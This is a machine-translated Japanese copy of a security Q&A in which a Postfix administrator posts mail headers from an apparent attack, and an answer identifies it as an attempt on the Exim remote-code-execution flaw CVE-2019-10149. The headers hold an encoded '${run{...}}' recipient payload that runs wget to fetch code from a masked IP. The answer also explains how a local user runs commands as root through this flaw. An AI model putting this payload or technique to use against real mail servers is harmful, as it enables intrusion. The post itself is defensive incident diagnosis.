web-dev-qa-db-ja.com

異常なメールヘッダーは、MTA攻撃の証拠を示しています。私は捕らえられましたか?

今日、私はキャッチオールの受信トレイに、件名、送信者、コンテンツのない非常に珍しいメールを見つけました。 Android=の私のGmailクライアントは、メールがmeによって送信されたと報告し、私の心の中で核警告を引き起こしました。

誰かが私の強力なパスワードを推測し、このメールが私のメール転送エージェント(MTA)から送信されたのではないかと恐れていたので、メールとメールログの両方を急いで調べました。それは起こりませんでした。

fail2banと私が聞いたことがないメールサーバーの脆弱性を不正利用するattemptのように見えるものが見つかりました。

Received: 20
Received: 19
Received: 22
Received: 21
Received: 18
Received: 15
Received: 14
Received: 17
Received: 16
Received: 29
Received: 28
Received: 31
Received: 30
Received: 27
Received: 24
Received: 23
Received: 26
Received: 25
Received: 13
Received: 3
Received: 4
Received: 5
Received: 2
Received: from example.org (localhost [127.0.0.1])
    by example.org (Postfix) with ESMTP id 1FA141219E6
    for <root+${run{x2Fbinx2Fsht-ctx22wgetx20YYY.YYY.YYY.YYYx2ftmpx2fYYY.YYY.YYY.YYYx22}}@example.org>; Wed, 19 Jun 2019 04:42:52 +0200 (CEST)
Received: from service.com (unknown [xx.xx.xx.xx])
    by example.org (Postfix) with SMTP
    for <root+${run{x2Fbinx2Fsht-ctx22wgetx20YYY.YYY.YYY.YYYx2ftmpx2fYYY.YYY.YYY.YYYx22}}@example.org>; Wed, 19 Jun 2019 04:42:50 +0200 (CEST)
Received: 1
Received: 10
Received: 11
Received: 12
Received: 9
Received: 6
Received: 7
Received: 8
Message-ID: <000701d52665$301b5e30$90521a90$@Domain>
MIME-Version: 1.0
Content-Type: text/plain;
    charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Outlook 16.0
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20xxx.xxx.xxx.xxxx2ftmpx2fxx.xxx.xxx.xxx22}}@example.org
Authentication-Results: example.org; 
X-DKIM-Authentication-Results: none
Thread-Index: AQHpZJXbpRRTStcSuHvAzmVQv5xuOw==

分析:送信者は、次の(エンコードされた)コマンドを起動し、潜在的な リモートコード実行 の脆弱性を利用するためにメールの宛先を変更しようとしました。ここで、XesのシーケンスはIPアドレスを示します

X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20xxx.xxx.xxx.xxxx2ftmpx2fxx.xxx.xxx.xxxx22}}@example.org


x2Fbinx2Fsht-ctx22wgetx20[IP ADDR]x2ftmpx2f[IP ADDR]x22
/bin/sht-ct#wget [IP ADDR]/tmp/[IP ADDR]#

sht-ctは私が慣れていない(または手動のURLデコードから誤って変換された)ものですが、サーバー上のMTAとしてPostfixを使用していることをすべての攻撃者が知っているという想定から始めます。

質問

私が疑うように、これが巧妙に細工された電子メールでリモートコマンド実行攻撃を仕掛ける本当の試みであるかどうかを確認したいと思います。第二に、私はpwnedを注意深く見る以外の方法で、私がtopであるかどうかを評価するように要請しますcrontab。この攻撃が私のMTAに影響を与えるのか、それとも古くて十分に修正された脆弱性を利用しようとするのかを理解する必要があります。

私はPostfixを更新するために急いでしましたが、脆弱性の知識がなければ(そしてそれがPostfixに影響を与える場合)、ほとんど手掛かりがありません。

私がラッシュがパブリックフォーラムでMTAについてセキュリティの質問をする理由は、私の意見/経験では、ハッキングされたメールサーバーボックスが比較して非常に短い時間で多くの損害を引き起こし始める可能性があるためです他の種類のサービスに、そしてそれはすぐに行動を必要とします.

attackspostfixremote-code-execution
66
usr-local-ΕΨΗΕΛΩΝ

これは、EXIMメールサーバーの現在のリモートコード実行の問題、つまり CVE-2019-10149 を悪用する試みです。詳細および発生したエクスプロイトの種類については、 ウィザードの戻り:EximのRCE を参照してください。 EXIMを使用していない場合、または固定バージョンを実行している場合は、安全です。

リンクされた記事から(強調を追加):

この脆弱性は、ローカルの攻撃者(およびリモートの攻撃者特定のデフォルト以外の構成)によって即座に悪用可能です。デフォルトの構成でこの脆弱性をリモートで悪用するには、攻撃者は(数分ごとに1バイトを送信することにより)脆弱なサーバーへの接続を7日間開いたままにする必要があります。ただし、Eximのコードは非常に複雑であるため、この悪用方法が一意であることは保証できません。より速いメソッドが存在する可能性があります

[...]

Expand_string()は「$ {run {}}」拡張アイテムを認識し、new-> addressは配信されるメールの受信者であるため、ローカルの攻撃者は単に「$ {run {...}} @ localhost」にメールし(「localhost」はEximのlocal_domainsの1つです)、ルートとして任意のコマンドを実行します(デフォルトでは、deliver_drop_privilegeはfalseです) :

root@debian:~# cat /tmp/id
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
89
Steffen Ullrich